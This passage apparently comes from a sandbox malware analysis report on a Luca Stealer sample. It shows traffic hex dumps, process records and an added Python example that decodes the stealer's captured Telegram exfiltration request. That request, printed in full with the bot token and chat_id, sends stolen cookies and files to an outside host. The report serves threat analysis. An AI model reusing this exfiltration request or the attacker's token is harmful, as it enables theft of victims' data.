                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 11 d8 a6 b5 46 57 2a 92 90 44 66 92 99 64 26 b6 b9 5f 44 10 11 00 d8 06 20 33 b1 8d 24 00 6c 93 99 00 94 52 90 04 80 6d 24 21 09 db 64 26 00 92 90 84 6d 6a ad d8 66 9a 26 6c 53 4a 01 20 33 a9 b5 d2 5a c3 36 f7 b3 0d 40 44 90 99 44 04 11 81 6d 6c 23 09 00 db 28 4d ad 15 49 b4 d6 68 ad 01 10 11 48 a2 b5 86 24 1e 48 12 92 90 44 66 72 3f 49 48 02 c0 36 b6 11 df 7f 64 fe 07 93 f9 6f 65 9b 17 46 e6 df c5 e2 df cf e6 05 92 78 61 a4 c2 bf 87 f9 17 48 60 03 80 cd 73 90 c0 46 12 2f 48 ad 95 fb d9 06 c0 36 cf 92 c6 36 00 b6 b1 0d 36 d8 5c 26 71 3f 21 1e 48 12 e9 89 17 26 cc 0b 94 e2 79 d9 00 c8 bc 50 32 97 59 fc 87 b2 cd 03 c9 fc 87 b2 cd 03 49 e2 7e b6 f9 d7 0a 9e 93 6d fe 2b c9 3c 8b 6d fe 3b d9 e6 5f 4b e6 45 66 9b e7 60 83 c4 bf 87 52 fc 67 92 79 16 db 3c 0f 25
                                      Data Ascii: FW*Dfd&_D 3$lRm$!d&mjf&lSJ 3Z6@DDml#(MIhH$HDfr?IH6doeFxaH`sF/H666\&q?!H&yP2YI~m+<m;_KEf`Rgy<%
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 22 02 db 48 02 c0 36 b6 b1 8d 6d 00 a2 16 24 41 9a 69 9a b0 4d 29 85 88 00 60 9a 26 24 51 15 48 02 c0 36 b6 b1 4d 29 05 db dc 4f 12 00 99 49 66 32 9b cd 18 c7 11 80 88 a0 b5 c6 34 4d 44 04 b3 d9 8c d6 1a b6 b1 cd fd 6c 13 11 44 04 00 b6 b1 0d 80 24 00 6c 03 e0 4c 22 02 49 d8 e6 81 6c 63 9b 88 20 33 c9 4c 6a ad 48 a2 b5 86 6d ba ae 63 9a 26 6c 53 6b 05 60 1c 47 00 6a ad b4 d6 90 84 24 24 01 60 1b db d8 a6 2b 15 db 64 26 b6 79 6e 11 41 66 02 10 11 00 64 26 00 11 81 6d 6c 03 20 09 00 db 00 44 04 92 b0 cd fd 32 13 db 00 94 52 88 08 32 13 db 00 d8 c6 36 00 11 81 24 86 61 20 22 a8 b5 92 99 64 26 11 81 24 32 93 88 40 12 b6 b1 8d 6d 24 21 09 a5 79 a0 88 00 20 33 b1 4d ad 95 69 9a 00 90 44 6b 0d 49 44 04 00 92 b0 0d 80 24 00 6c 03 20 09 e9 07 57 e6 99 6c f3 3f 82
                                      Data Ascii: "H6m$AiM)`&$QH6M)OIf24MDlD$lL"Ilc 3LjHmc&lSk`Gj$$`+d&ynAfd&ml D2R26$a "d&$2@m$!y 3MiDkID$l Wl?
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 13 80 d9 d7 1e f2 dc 6c 03 20 89 fb d9 e6 bf cb 77 f3 e3 bc c7 7b bc 07 ad 25 cf 66 cc 73 13 3f fb f8 03 7e f6 f1 87 fc ee ad 4b 9e b1 3b f1 40 0f 3a 5e 79 cd 07 2f 78 cb c7 6c f0 16 8f da 04 c0 3c 37 83 c1 40 57 2b 5f ff 0d df c0 c7 1c 7b 7f 9e af 10 48 44 04 00 25 3a 9e 2f 1b 03 d9 1a 69 23 c0 36 d8 60 03 80 13 6c 5e a8 34 f7 db 38 ff 35 f4 87 bf c9 7f a4 77 7a a9 37 e0 eb de ea e3 f9 f7 f8 ac cf f8 54 be f8 a1 9f c6 bf 49 9a ff 56 69 fe 3d 6c f3 ef 11 0e fe 3d 6c f3 1f c5 36 cf 4d e6 85 92 84 6d 1e c8 36 2f aa e0 85 b3 cd bf 96 6d 64 fe 53 d8 e6 81 64 fe d3 d9 26 cc f3 90 44 66 f2 6f 21 89 cb 52 bc 30 b6 f9 f7 08 fe 75 6c f3 af 92 e6 3f 92 6d fe ad 6c 73 3f 99 17 2a b8 a2 d9 3c 50 f0 82 d9 46 06 49 bc 20 b6 f9 d7 08 f3 42 d9 c6 36 0f 64 9b fb 05 e2 45
                                      Data Ascii: l w{%fs?~K;@:^y/xl<7@W+_{HD%:/i#6`l^485wz7TIVi=l=l6Mm6/mdSd&Dfo!R0ul?mls?*<PFI B6dE
                                      2024-06-01 16:51:34 UTC16384OUTData Raw: 5a 43 12 00 b6 91 84 24 5a 6b 00 48 22 22 90 84 6d 32 13 80 88 20 0c b6 b9 9f 24 24 61 1b 80 cc c4 36 b6 91 44 44 10 11 48 42 12 d3 38 52 4a a1 b5 46 6b 8d 52 0a 11 81 6d 00 32 93 07 92 44 66 22 89 5a 2b ad 35 6c 63 1b 00 db dc 4f 12 92 b8 9f 6d 6c 03 20 89 88 80 34 11 01 40 66 92 99 48 22 22 28 a5 30 0c 03 00 92 00 b0 8d 6d 24 21 09 4f 0d db 48 a2 d6 4a 44 90 99 d8 c6 36 ad 35 24 21 89 07 92 84 24 32 13 db 3c 90 24 6c 93 99 d4 52 b0 4d 66 02 10 11 44 04 b6 c9 4c 00 6c 23 89 88 20 0c 99 89 24 4a 29 ac d7 6b 22 02 49 48 82 34 00 92 00 68 4e ee 27 89 e7 66 9b fb 49 42 12 00 b6 b1 4d 0d 91 99 64 26 99 89 24 22 02 49 dc cf 36 b6 b9 9f 6d ee 57 4a 07 40 66 02 50 4a c1 36 ad 35 22 82 d6 1a 11 81 24 00 32 13 00 49 48 82 96 94 52 68 ad 11 11 d8 26 33 e9 ba 8e cc
                                      Data Ascii: ZC$ZkH""m2 $$a6DDHB8RJFkRm2Df"Z+5lcOml 4@fH""(0m$!OHJD65$!$2<$lRMfDLl# $J)k"IH4hN'fIBMd&$"I6mWJ@fPJ65"$2IHRh&3
                                      2024-06-01 16:51:35 UTC | 389 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Sat, 01 Jun 2024 16:51:35 GMT
                                      Content-Type: application/json
                                      Content-Length: 1274
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
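                                      Decoding the exchange above. The Python below is an added worked example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It takes the captured request line, the request headers and the first hex-dumped chunk of the multipart body exactly as printed above, extracts the bot token, chat_id and the URL-encoded caption (the stealer's own summary of what it collected), reads the uploaded part's filename and content type, and walks the ZIP local-file headers at the start of the upload. The function names (parse_request_line, parse_caption, parse_multipart_head, list_zip_entries, summarize_capture) are mine. The report's hex dump stops inside the second ZIP header, so the walker marks the payload as incomplete instead of guessing past the cut.

```python
import re
import struct
from urllib.parse import parse_qs

# Request line and headers exactly as captured above (raw string: the FileLocation value holds backslashes).
REQUEST_LINE = r"POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20E26RT4853%20(1280,%201024)%0AHWID:%205059308222394286%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\cOQD62FceM.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1"
REQUEST_HEADERS = {"content-type": "multipart/form-data; boundary=4ee1a642069b7585-40d3276220905d9c-7e8720fa17384bed-798f4ce62581489a",
                   "content-length": "980180", "accept": "*/*", "host": "api.telegram.org"}
# Leading bytes of the multipart body as printed in the report's hex dump. The dump stops inside the
# second ZIP local-file header, so the walker below has to tolerate a truncated payload.
BODY_HEX = """
2d 2d 34 65 65 31 61 36 34 32 30 36 39 62 37 35 38 35 2d 34 30 64 33 32 37 36 32 32 30 39 30 35 64 39 63 2d
37 65 38 37 32 30 66 61 31 37 33 38 34 62 65 64 2d 37 39 38 66 34 63 65 36 32 35 38 31 34 38 39 61 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20
66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 2e 7a 69 70 22 0d 0a
43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a
50 4b 03 04 14 00 00 00 00 00 a3 94 c1 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f
50 4b 03 04 14 00 00 00 00 00 a3 94 c1 58 00 00 00 00 00 00 00 00 00 00 00 00 08
"""
BODY = bytes.fromhex(BODY_HEX)

TELEGRAM_RE = re.compile(r"^POST /bot(?P<token>\d+:[\w-]+)/(?P<method>\w+)\?(?P<query>\S+) HTTP/1\.[01]$")
ZIP_LOCAL_SIG = 0x04034B50
ZIP_LOCAL_HDR = struct.Struct("<IHHHHHIIIHH")  # sig, version, flags, method, time, date, crc32, csize, usize, name_len, extra_len

def parse_request_line(line):
    """Split a Bot API request into bot token, method and the decoded query parameters."""
    m = TELEGRAM_RE.match(line)
    if m is None:
        raise ValueError("not a Telegram Bot API request line")
    qs = parse_qs(m["query"], keep_blank_values=True)  # percent-decodes the UTF-8 caption, emoji included
    first = lambda k: qs.get(k, [""])[0]
    return {"token": m["token"], "bot_id": m["token"].split(":", 1)[0], "method": m["method"],
            "chat_id": first("chat_id"), "parse_mode": first("parse_mode"), "caption": first("caption")}

def parse_caption(caption):
    """Turn the stealer's 'Key: value' summary into a dict. '- Section -' lines are skipped and
    indented '- item' lines are folded into the preceding key (GPU and Antivirus in this capture)."""
    fields, last_key = {}, None
    for raw in caption.split("\n"):
        line = raw.strip()
        if not line or (line.startswith("- ") and line.endswith(" -")):
            continue
        if line.startswith("- ") and last_key is not None:
            fields[last_key] = (fields[last_key] + " " + line[2:]).strip()
            continue
        key, sep, value = line.partition(":")
        if sep:
            last_key = key.strip()
            fields[last_key] = value.strip()
    return fields

def parse_multipart_head(headers, body):
    """Read the first multipart part's headers; return its filename, content type and payload."""
    boundary = re.search(r"boundary=([^;\s]+)", headers["content-type"]).group(1).encode()
    delim = b"--" + boundary + b"\r\n"
    if not body.startswith(delim):
        raise ValueError("body does not start with the declared boundary")
    head_end = body.index(b"\r\n\r\n", len(delim))
    part_headers = body[len(delim):head_end].decode("latin-1")
    filename = re.search(r'filename="([^"]*)"', part_headers)
    ctype = re.search(r"Content-Type:\s*(\S+)", part_headers, re.I)
    return {"filename": filename.group(1) if filename else None, "content_type": ctype.group(1) if ctype else None,
            "declared_length": int(headers["content-length"]), "payload": body[head_end + 4:]}

def dos_date(d):
    """MS-DOS date word -> ISO date (ZIP timestamps are local time with no zone)."""
    return f"{(d >> 9) + 1980:04d}-{(d >> 5) & 0xF:02d}-{d & 0x1F:02d}"

def list_zip_entries(payload):
    """Walk ZIP local-file headers in a possibly truncated payload. Returns (entries, incomplete)."""
    entries, off = [], 0
    while off + ZIP_LOCAL_HDR.size <= len(payload):
        sig, _ver, flags, method, _mtime, mdate, _crc, csize, _usize, nlen, xlen = ZIP_LOCAL_HDR.unpack_from(payload, off)
        if sig != ZIP_LOCAL_SIG:
            return entries, False  # reached the central directory (or non-ZIP bytes): done
        name_end = off + ZIP_LOCAL_HDR.size + nlen
        if name_end + xlen > len(payload):
            break  # header present but name/extra field cut off
        entries.append({"name": payload[off + ZIP_LOCAL_HDR.size:name_end].decode("utf-8", "replace"),
                        "method": method, "csize": csize, "date": dos_date(mdate)})
        if flags & 0x08:  # data-descriptor flag: sizes follow the data, so we cannot skip ahead
            return entries, True
        off = name_end + xlen + csize
    return entries, off < len(payload)  # leftover bytes that do not form a full header

def summarize_capture(request_line=REQUEST_LINE, headers=REQUEST_HEADERS, body=BODY):
    req = parse_request_line(request_line)
    upload = parse_multipart_head(headers, body)
    entries, incomplete = list_zip_entries(upload.pop("payload"))
    return {**req, "fields": parse_caption(req["caption"]), "upload": upload,
            "zip_entries": entries, "zip_incomplete": incomplete}

if __name__ == "__main__":
    r = summarize_capture()
    print(f"bot {r['bot_id']} -> chat {r['chat_id']} via {r['method']}; upload {r['upload']}")
    print({k: r["fields"][k] for k in ("IP", "HWID", "Is Elevated", "Cookies", "Files")})
    print("zip entries:", r["zip_entries"], "incomplete:", r["zip_incomplete"])
```

                                      Run as a script it prints the decoded summary. The caption confirms what this run actually exfiltrated (Cookies: ✅ 2 and Files: ✅ 40, with ❌ for passwords, wallets, cards, FTP/SSH and Discord tokens), the upload is the 980180-byte ZIP named [US]_173.254.250.91.zip, and the first local-file header is the Autofill/ directory whose MS-DOS date decodes to 2024-06-01, matching the analysis date. The numeric bot id 6639722633 and chat_id -4003506161 are the indicators worth sharing; the full token is the attacker's API credential and should be handled as one, not pasted into reports or reused.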


                                      Target ID: 0
                                      Start time: 12:50:36
                                      Start date: 01/06/2024
                                      Path: C:\Users\user\Desktop\cOQD62FceM.exe
                                      Wow64 process (32bit): false
                                      Commandline: "C:\Users\user\Desktop\cOQD62FceM.exe"
                                      Imagebase: 0x7ff747670000
                                      File size: 5'484'544 bytes
                                      MD5 hash: AF412B399914B80044340ADE572BF2AB
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation: low
                                      Has exited: true

                                      Target ID: 3
                                      Start time: 12:51:12
                                      Start date: 01/06/2024
                                      Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit): false
                                      Commandline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                      Imagebase: 0x7ff7be880000
                                      File size: 452'608 bytes
                                      MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high
                                      Has exited: true

                                      Target ID: 4
                                      Start time: 12:51:12
                                      Start date: 01/06/2024
                                      Path: C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit): false
                                      Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase: 0x7ff6d64d0000
                                      File size: 862'208 bytes
                                      MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high
                                      Has exited: true

                                      No disassembly